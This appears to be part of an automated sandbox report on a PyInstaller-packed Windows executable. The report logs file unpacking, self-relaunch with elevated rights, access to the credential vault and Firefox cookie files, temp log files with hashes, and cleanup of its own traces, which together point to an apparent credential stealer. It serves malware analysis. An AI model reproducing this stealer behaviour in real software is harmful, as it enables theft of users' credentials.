File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 40960, size_out = 40960 True 1
Fn
Data
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 4096, size_out = 4096 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\pywintypes27.dll, desired_access = FILE_READ_ATTRIBUTES, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE False 1
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\pywintypes27.dll, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\pywintypes27.dll, type = file_type True 1
Fn
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\pywintypes27.dll, size = 106496 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\pywintypes27.dll, size = 3584 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, type = file_type True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 4096, size_out = 4096 True 2
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\select.pyd, desired_access = FILE_READ_ATTRIBUTES, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE False 1
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\select.pyd, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\select.pyd, type = file_type True 1
Fn
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\select.pyd, size = 8192 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\select.pyd, size = 3584 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, type = file_type True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 315392, size_out = 315392 True 1
Fn
Data
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 4096, size_out = 4096 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\sqlite3.dll, desired_access = FILE_READ_ATTRIBUTES, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE False 1
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\sqlite3.dll, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\sqlite3.dll, type = file_type True 1
Fn
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\sqlite3.dll, size = 552960 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, type = file_type True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 258048, size_out = 258048 True 1
Fn
Data
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 4096, size_out = 4096 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\unicodedata.pyd, desired_access = FILE_READ_ATTRIBUTES, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE False 1
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\unicodedata.pyd, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\unicodedata.pyd, type = file_type True 1
Fn
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\unicodedata.pyd, size = 688128 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\unicodedata.pyd, size = 512 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, type = file_type True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 8192, size_out = 8192 True 1
Fn
Data
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 4096, size_out = 4096 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\win32pipe.pyd, desired_access = FILE_READ_ATTRIBUTES, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE False 1
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\win32pipe.pyd, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\win32pipe.pyd, type = file_type True 1
Fn
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\win32pipe.pyd, size = 20480 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\win32pipe.pyd, size = 3584 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, type = file_type True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 8192, size_out = 8192 True 1
Fn
Data
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 4096, size_out = 4096 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\win32wnet.pyd, desired_access = FILE_READ_ATTRIBUTES, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE False 1
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\win32wnet.pyd, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\win32wnet.pyd, type = file_type True 1
Fn
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\win32wnet.pyd, size = 24576 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\win32wnet.pyd, size = 512 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, type = file_type True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 4096, size_out = 4096 True 2
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\Include, desired_access = FILE_READ_ATTRIBUTES, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE False 1
Fn
File Create Directory C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\Include True 1
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\Include\pyconfig.h, desired_access = FILE_READ_ATTRIBUTES, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE False 1
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\Include\pyconfig.h, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\Include\pyconfig.h, type = file_type True 1
Fn
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\Include\pyconfig.h, size = 20480 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\Include\pyconfig.h, size = 841 True 1
Fn
Data
Environment Set Environment String name = _MEIPASS2, value = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802 True 1
Fn
Environment Get Environment String name = _MEIPASS2, result_out = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802 True 1
Fn
Process Create process_name = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, os_pid = 0xbb8, startup_flags = STARTF_USESHOWWINDOW, STARTF_USESTDHANDLES, show_window = SW_SHOWNORMAL True 1
Fn
File Delete filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\bz2.pyd True 1
Fn
File Delete filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\Crypto.Cipher._AES.pyd True 1
Fn
File Delete filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\Crypto.Cipher._DES3.pyd True 1
Fn
File Delete filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\Crypto.Hash._SHA256.pyd True 1
Fn
File Delete filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\Crypto.Random.OSRNG.winrandom.pyd True 1
Fn
File Delete filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\Crypto.Util._counter.pyd True 1
Fn
File Delete filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\Include\pyconfig.h True 1
Fn
File Delete Directory directory = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\Include True 1
Fn
File Delete filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\main.exe.manifest True 1
Fn
File Delete filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\Microsoft.VC90.CRT.manifest True 1
Fn
File Delete filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\msvcm90.dll True 1
Fn
File Delete filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\msvcp90.dll True 1
Fn
File Delete filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\msvcr90.dll True 1
Fn
File Delete filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\pyexpat.pyd True 1
Fn
File Delete filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\python27.dll True 1
Fn
File Delete filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\pywintypes27.dll True 1
Fn
File Delete filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\select.pyd True 1
Fn
File Delete filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\sqlite3.dll True 1
Fn
File Delete filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\unicodedata.pyd True 1
Fn
File Delete filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\win32pipe.pyd True 1
Fn
File Delete filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\win32wnet.pyd True 1
Fn
File Delete filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\_ctypes.pyd True 1
Fn
File Delete filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\_hashlib.pyd True 1
Fn
File Delete filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\_socket.pyd True 1
Fn
File Delete filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\_sqlite3.pyd True 1
Fn
File Delete filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\_ssl.pyd True 1
Fn
File Delete Directory directory = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802 True 1
Fn
Module Get Handle module_name = c:\users\eebsym5\appdata\local\temp\vkvmtnchwv3w.exe, base_address = 0x1250000 True 2
Fn
Module Load module_name = api-ms-win-appmodel-runtime-l1-1-1, base_address = 0x0 False 2
Fn
Module Load module_name = ext-ms-win-kernel32-package-current-l1-1-0, base_address = 0x0 False 2
Fn
Module Get Handle module_name = mscoree.dll False 1
Fn
Process #6: vkvmtnchwv3w.exe
873 203
»
Information Value
ID #6
File Name c:\users\eebsym5\appdata\local\temp\vkvmtnchwv3w.exe
Command Line "C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe"
Initial Working Directory C:\Users\EEBsYm5\Desktop\
Monitor Start Time: 00:01:19, Reason: Child Process
Unmonitor End Time: 00:01:22, Reason: Self Terminated
Monitor Duration 00:00:03
OS Process Information
»
Information Value
PID 0xbb8
Parent PID 0xba4 (c:\users\eebsym5\appdata\local\temp\vkvmtnchwv3w.exe)
Is Created or Modified Executable True
Integrity Level High (Elevated)
Username CRH2YWU7\EEBsYm5
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x BBC
0x BC0
0x BC4
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory rw True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory rw True False False -
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory rw True False False -
pagefile_0x0000000000030000 0x00030000 0x00033fff Pagefile Backed Memory r True False False -
locale.nls 0x00040000 0x000a6fff Memory Mapped File r False False False -
pagefile_0x00000000000b0000 0x000b0000 0x000b0fff Pagefile Backed Memory r True False False -
pagefile_0x00000000000c0000 0x000c0000 0x000c0fff Pagefile Backed Memory r True False False -
imm32.dll 0x000d0000 0x000ecfff Memory Mapped File r False False False -
private_0x00000000000d0000 0x000d0000 0x000d0fff Private Memory rw True False False -
private_0x00000000000e0000 0x000e0000 0x000e0fff Private Memory rw True False False -
tzres.dll 0x000f0000 0x000f0fff Memory Mapped File r False False False -
pagefile_0x00000000000f0000 0x000f0000 0x000f0fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000100000 0x00100000 0x00106fff Pagefile Backed Memory r True False False -
private_0x0000000000110000 0x00110000 0x0020ffff Private Memory rw True False False -
pagefile_0x0000000000210000 0x00210000 0x00211fff Pagefile Backed Memory rw True False False -
private_0x0000000000220000 0x00220000 0x00220fff Private Memory rwx True False False -
pagefile_0x0000000000230000 0x00230000 0x00230fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000240000 0x00240000 0x00240fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000250000 0x00250000 0x00250fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000260000 0x00260000 0x00260fff Pagefile Backed Memory r True False False -
private_0x0000000000270000 0x00270000 0x0036ffff Private Memory rw True False False -
pagefile_0x0000000000370000 0x00370000 0x00437fff Pagefile Backed Memory r True False False -
rsaenh.dll 0x00440000 0x0047bfff Memory Mapped File r False False False -
pagefile_0x0000000000440000 0x00440000 0x00440fff Pagefile Backed Memory r True False False -
cookies.sqlite-shm 0x00450000 0x00457fff Memory Mapped File rw True True False
private_0x00000000004a0000 0x004a0000 0x004affff Private Memory rw True False False -
pagefile_0x00000000004b0000 0x004b0000 0x005b0fff Pagefile Backed Memory r True False False -
pagefile_0x00000000005c0000 0x005c0000 0x011bffff Pagefile Backed Memory r True False False -
vkvmtnchwv3w.exe 0x01250000 0x0129dfff Memory Mapped File rwx True True False
private_0x00000000012a0000 0x012a0000 0x0138ffff Private Memory rw True False False -
kernelbase.dll.mui 0x012a0000 0x0135ffff Memory Mapped File rw False False False -
private_0x0000000001380000 0x01380000 0x0138ffff Private Memory rw True False False -
private_0x0000000001390000 0x01390000 0x0148ffff Private Memory rw True False False -
pagefile_0x0000000001490000 0x01490000 0x01882fff Pagefile Backed Memory r True False False -
private_0x0000000001890000 0x01890000 0x01a8ffff Private Memory rw True False False -
sortdefault.nls 0x01a90000 0x01d5efff Memory Mapped File r False False False -
private_0x0000000001d60000 0x01d60000 0x0215ffff Private Memory rw True False False -
private_0x0000000002160000 0x02160000 0x0226ffff Private Memory rw True False False -
private_0x0000000002160000 0x02160000 0x021fffff Private Memory rw True False False -
private_0x0000000002230000 0x02230000 0x0226ffff Private Memory rw True False False -
private_0x0000000002320000 0x02320000 0x0241ffff Private Memory rw True False False -
private_0x0000000002420000 0x02420000 0x02743fff Private Memory rw True False False -
private_0x0000000002420000 0x02420000 0x0261ffff Private Memory rw True False False -
private_0x0000000002420000 0x02420000 0x0251ffff Private Memory rw True False False -
private_0x00000000025e0000 0x025e0000 0x0261ffff Private Memory rw True False False -
crypto.cipher._des3.pyd 0x10000000 0x1000ffff Memory Mapped File rwx True False False -
_hashlib.pyd 0x6a8b0000 0x6a9adfff Memory Mapped File rwx True False False -
python27.dll 0x6a9b0000 0x6ac47fff Memory Mapped File rwx True True False
sqlite3.dll 0x6b2c0000 0x6b34afff Memory Mapped File rwx True False False -
_ssl.pyd 0x6b350000 0x6b4acfff Memory Mapped File rwx True False False -
_sqlite3.pyd 0x6e170000 0x6e17ffff Memory Mapped File rwx True False False -
vaultcli.dll 0x6e710000 0x6e71bfff Memory Mapped File rwx False False False -
_socket.pyd 0x6e720000 0x6e72efff Memory Mapped File rwx True False False -
_ctypes.pyd 0x6ee80000 0x6ee99fff Memory Mapped File rwx True False False -
rasadhlp.dll 0x704a0000 0x704a5fff Memory Mapped File rwx False False False -
msvcr90.dll 0x713b0000 0x71452fff Memory Mapped File rwx False False False -
api-ms-win-core-synch-l1-2-0.dll 0x71f10000 0x71f12fff Memory Mapped File rwx False False False -
fwpuclnt.dll 0x736b0000 0x736e7fff Memory Mapped File rwx False False False -
winnsi.dll 0x737c0000 0x737c6fff Memory Mapped File rwx False False False -
iphlpapi.dll 0x737d0000 0x737ebfff Memory Mapped File rwx False False False -
wshtcpip.dll 0x74960000 0x74964fff Memory Mapped File rwx False False False -
rsaenh.dll 0x74bf0000 0x74c2afff Memory Mapped File rwx False False False -
dnsapi.dll 0x74cd0000 0x74d13fff Memory Mapped File rwx False False False -
wship6.dll 0x74e00000 0x74e05fff Memory Mapped File rwx False False False -
mswsock.dll 0x74e10000 0x74e4bfff Memory Mapped File rwx False False False -
cryptsp.dll 0x74e50000 0x74e65fff Memory Mapped File rwx False False False -
cryptbase.dll 0x752d0000 0x752dbfff Memory Mapped File rwx False False False -
msasn1.dll 0x753f0000 0x753fbfff Memory Mapped File rwx False False False -
crypt32.dll 0x75420000 0x7553cfff Memory Mapped File rwx False False False -
kernelbase.dll 0x75540000 0x75589fff Memory Mapped File rwx False False False -
rpcrt4.dll 0x75680000 0x75720fff Memory Mapped File rwx False False False -
nsi.dll 0x75810000 0x75815fff Memory Mapped File rwx False False False -
shell32.dll 0x75830000 0x76479fff Memory Mapped File rwx False False False -
lpk.dll 0x76480000 0x76489fff Memory Mapped File rwx False False False -
imm32.dll 0x76490000 0x764aefff Memory Mapped File rwx False False False -
ole32.dll 0x76750000 0x768abfff Memory Mapped File rwx False False False -
kernel32.dll 0x76910000 0x769e3fff Memory Mapped File rwx False False False -
advapi32.dll 0x769f0000 0x76a8ffff Memory Mapped File rwx False False False -
msvcrt.dll 0x76a90000 0x76b3bfff Memory Mapped File rwx False False False -
user32.dll 0x76b40000 0x76c08fff Memory Mapped File rwx False False False -
oleaut32.dll 0x76c10000 0x76c9efff Memory Mapped File rwx False False False -
msctf.dll 0x76ca0000 0x76d6bfff Memory Mapped File rwx False False False -
usp10.dll 0x76d70000 0x76e0cfff Memory Mapped File rwx False False False -
shlwapi.dll 0x76e10000 0x76e66fff Memory Mapped File rwx False False False -
ntdll.dll 0x77230000 0x7736bfff Memory Mapped File rwx False False False -
ws2_32.dll 0x77380000 0x773b4fff Memory Mapped File rwx False False False -
sechost.dll 0x773c0000 0x773d8fff Memory Mapped File rwx False False False -
gdi32.dll 0x773e0000 0x7742dfff Memory Mapped File rwx False False False -
apisetschema.dll 0x77470000 0x77470fff Memory Mapped File rwx False False False -
pagefile_0x000000007f6f0000 0x7f6f0000 0x7f7effff Pagefile Backed Memory r True False False -
pagefile_0x000000007ffb0000 0x7ffb0000 0x7ffd2fff Pagefile Backed Memory r True False False -
private_0x000000007ffd8000 0x7ffd8000 0x7ffd8fff Private Memory rw True False False -
private_0x000000007ffdd000 0x7ffdd000 0x7ffddfff Private Memory rw True False False -
private_0x000000007ffde000 0x7ffde000 0x7ffdefff Private Memory rw True False False -
private_0x000000007ffdf000 0x7ffdf000 0x7ffdffff Private Memory rw True False False -
Created Files
»
Filename File Size Hash Values YARA Match Actions
C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\cookies.sqlite-shm 32.00 KB MD5: b7c14ec6110fa820ca6b65f5aec85911
SHA1: 608eeb7488042453c9ca40f7e1398fc1a270f3f4
SHA256: fd4c9fda9cd3f9ae7c962b0ddf37232294d55580e1aa165aa06129b8549389eb
SSDeep: 3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
False
c:\users\eebsym5\appdata\local\temp\fvwresvqqzq 18.00 KB MD5: 29844404ae855e9df054833f71888eb1
SHA1: 3e86f08def08fc14ddec0227d0643319562666db
SHA256: c381401ea96dfe9b926126dcbbc0dd6ab541dbf549732cc6c66f20096b1f663e
SSDeep: 24:LLijhJ0KL7G0TMJHUyyJtmCm0u6lOKQAE9V8FsffDVOzeCmly6UwcTa/HMQW:wz+JH3yJUhJCVE9V8FsXhFlNU1Ts3W
False
c:\users\eebsym5\appdata\local\temp\mybrs.log 0.44 KB MD5: 377177eb667fc31310cdb419f8bd0f7e
SHA1: 35e3ca98b5c49caa247124c0d59371b5c78c8fba
SHA256: d26f31f843b61ace4513d28f98424e24acc9e89b0520e211a3d8b7100a28b4ce
SSDeep: 12:qrgteH0H2M+LNhPibo+zcMEuKFaJg7ndc1K:IKONhKF/EuKFaJimK
False
c:\users\eebsym5\appdata\local\temp\9r5qk2 0.00 KB MD5: 3f1d1d8d87177d3d8d897d7e421f84d6
SHA1: dd082d742a5cb751290f1db2bd519c286aa86d95
SHA256: f02285fb90ed8c81531fe78cf4e2abb68a62be73ee7d317623e2c3e3aefdfff2
SSDeep: 3:qn:qn
False
c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe 7.00 KB MD5: e0005de376874498d2f66f6503cf1399
SHA1: baec963b5918094a50a4b08292bb230eeebd6897
SHA256: 32812d196066c99bf3852fad78b00063dc68e6cc5fb26ae6c862c8c5777d51b0
SSDeep: 48:tNecVTgPOpEveoJZFrU10WBcPz9K4t9EiDYo:tVSNDX2AK4t9p
False
c:\users\eebsym5\appdata\local\temp\mybrs.log 0.13 KB MD5: a4aa7ec6ac16506a35f56d57e1d1f51f
SHA1: 8cdd756595a2431228ff25b615ed50de783dc365
SHA256: d6ab363af3135a13c026ba865909a83010f2c1ce4f40ceecd61aedd649a80c47
SSDeep: 3:dXAaI+n4t+divXf4hQgFu5wWDl7Qp4EaKC50HE9jnI0ZAFyn:dQaI+4t3Xf4tFuNFQ/aZ50HE9bRZx
False
c:\users\eebsym5\appdata\local\temp\mybrs.log 0.36 KB MD5: 4e8a981abf12a8d545be3921c4a72102
SHA1: d7668647c81060e2346aa8d2a515f0914337853d
SHA256: 665ac4f11caaab2e42eeb26d61d003c12df62d45014be29413cca90d45ff08d2
SSDeep: 6:dQaI+4t3Xf4tFuNFQ/aZ50HE9bRZUaI+oXf4LHthUUDGbbTAaI+oXf4zcMEuKFbn:qrgteH0H2M+LNhPibo+zcMEuKFb
False
c:\users\eebsym5\appdata\local\temp\mybrs.log 0.24 KB MD5: 5c8b016bbcb1cbf277be5e98740e7d94
SHA1: 722545a1a7fd6ed18658119024d8ff09019278b6
SHA256: 5414514a3c32f3d02be8258a4c7f8588161414b84c5101e4571d058352b9f455
SSDeep: 6:dQaI+4t3Xf4tFuNFQ/aZ50HE9bRZUaI+oXf4LHthUUDGbbZ:qrgteH0H2M+LNhPibd
False
Threads
Thread 0xbbc
873 41
»
Category Operation Information Success Count Logfile
System Get Time type = System Time, time = 2018-08-10 04:09:14 (UTC) True 1
Fn
Module Load module_name = api-ms-win-core-synch-l1-2-0, base_address = 0x0 False 1
Fn
Module Load module_name = api-ms-win-core-synch-l1-2-0, base_address = 0x71f10000 True 1
Fn
Module Get Address module_name = c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll, function = InitializeCriticalSectionEx, address_out = 0x0 False 1
Fn
Module Load module_name = api-ms-win-core-fibers-l1-1-1, base_address = 0x0 False 2
Fn
Module Load module_name = kernel32, base_address = 0x0 False 1
Fn
Module Load module_name = kernel32, base_address = 0x76910000 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = FlsAlloc, address_out = 0x7696418d True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = FlsSetValue, address_out = 0x769676e6 True 1
Fn
Module Load module_name = api-ms-win-core-synch-l1-2-0, base_address = 0x0 False 1
Fn
Module Load module_name = api-ms-win-core-synch-l1-2-0, base_address = 0x71f10000 True 1
Fn
Module Get Address module_name = c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll, function = InitializeCriticalSectionEx, address_out = 0x0 False 1
Fn
Module Load module_name = api-ms-win-core-fibers-l1-1-1, base_address = 0x0 False 2
Fn
Module Load module_name = kernel32, base_address = 0x0 False 1
Fn
Module Load module_name = kernel32, base_address = 0x76910000 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = FlsAlloc, address_out = 0x7696418d True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = FlsGetValue, address_out = 0x76961e16 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = FlsSetValue, address_out = 0x769676e6 True 1
Fn
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Get Info filename = STD_INPUT_HANDLE, type = file_type True 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Get Info filename = STD_OUTPUT_HANDLE, type = file_type True 1
Fn
File Open filename = STD_ERROR_HANDLE True 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type True 1
Fn
Module Load module_name = api-ms-win-core-localization-l1-2-1, base_address = 0x0 False 2
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = LCMapStringEx, address_out = 0x7699f72b True 1
Fn
Module Get Filename module_name = api-ms-win-core-localization-l1-2-1, process_name = c:\users\eebsym5\appdata\local\temp\vkvmtnchwv3w.exe, file_name_orig = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 260 True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Module Get Filename module_name = api-ms-win-core-localization-l1-2-1, process_name = c:\users\eebsym5\appdata\local\temp\vkvmtnchwv3w.exe, file_name_orig = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 4096 True 1
Fn
Environment Get Environment String name = _MEIPASS2, result_out = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802 True 1
Fn
Environment Set Environment String name = _MEIPASS2 True 1
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
